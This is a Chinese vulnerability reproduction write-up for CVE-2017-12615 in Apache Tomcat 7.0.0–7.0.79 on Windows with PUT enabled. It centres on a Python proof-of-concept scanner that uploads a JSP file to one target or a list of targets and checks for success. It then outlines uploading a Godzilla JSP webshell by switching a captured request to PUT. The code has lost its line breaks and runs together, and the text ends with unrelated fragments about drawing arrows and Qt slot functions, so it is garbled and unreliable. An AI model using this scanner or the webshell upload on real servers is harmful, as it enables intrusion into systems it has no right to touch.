漏洞描述:
当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法
影响范围:
Apache Tomcat 7.0.0 - 7.0.79
漏洞复现:
创建vulfocus靶场容器
poc
#CVE-2017-12615 POC
import requests
import optparse
import osparse = optparse.OptionParser(usage = 'python3 %prog [-h] [-u URL] [-p PORT] [-f FILE]')
parse.add_option('-u','--url',dest='URL',help='target url')
parse.add_option('-p','--port',dest='PORT',help='target port[default:8080]',default='8080')
parse.add_option('-f',dest='FILE',help='target list')options,args = parse.parse_args()
#print(options)
#验证参数是否完整
if (not options.URL or not options.PORT) and not options.FILE:print('Usage:python3 CVE-2017-12615-POC.py [-u url] [-p port] [-f FILE]\n')exit('CVE-2017-12615-POC.py:error:missing a mandatory option(-u,-p).Use -h for basic and -hh for advanced help')filename = '/hello.jsp'#测试数据
data = 'hello'#提交PUT请求
#resp = requests.post(url1,headers=headers,data=data)#验证文件是否上传成功
#response = requests.get(url2)
#上传文件
def upload(url):try:response = requests.put(url+filename+'/',data=data)return 1except Exception as e:print("[-] {0} 连接失败".format(url))return 0
def checking(url):try:#验证文件是否上传成功response = requests.get(url+filename)#print(url+filename)if response.status_code == 200 and 'hello' in response.text:print('[+] {0} 存在CVE-2017-12615 Tomcat 任意文件读写漏洞'.format(url))else:print('[-] {0} 不存在CVE-2017-12615 Tomcat 任意文件读写漏洞'.format(url))except Exception as e:#print(e)print("[-] {0} 连接失败".format(url))
if options.FILE and os.path.exists(options.FILE):with open(options.FILE) as f:urls = f.readlines()#print(urls)for url in urls:url = str(url).replace('\n', '').replace('\r', '').strip()if upload(url) == 1:checking(url)
elif options.FILE and not os.path.exists(options.FILE):print('[-] {0} 文件不存在'.format(options.FILE))
else:#上传链接url = options.URL+':'+options.PORTif upload(url) == 1:checking(url)显示存在漏洞
使用哥斯拉创建jsp的webshell
访问网页,抓取流量包
将原本的get请求更改成put请求格式
的时候总是有箭头,如何还原成只画直线)
:对控件采用自动增加函数(转到槽)的方式,发现函数不能被调用的解决方案)
)
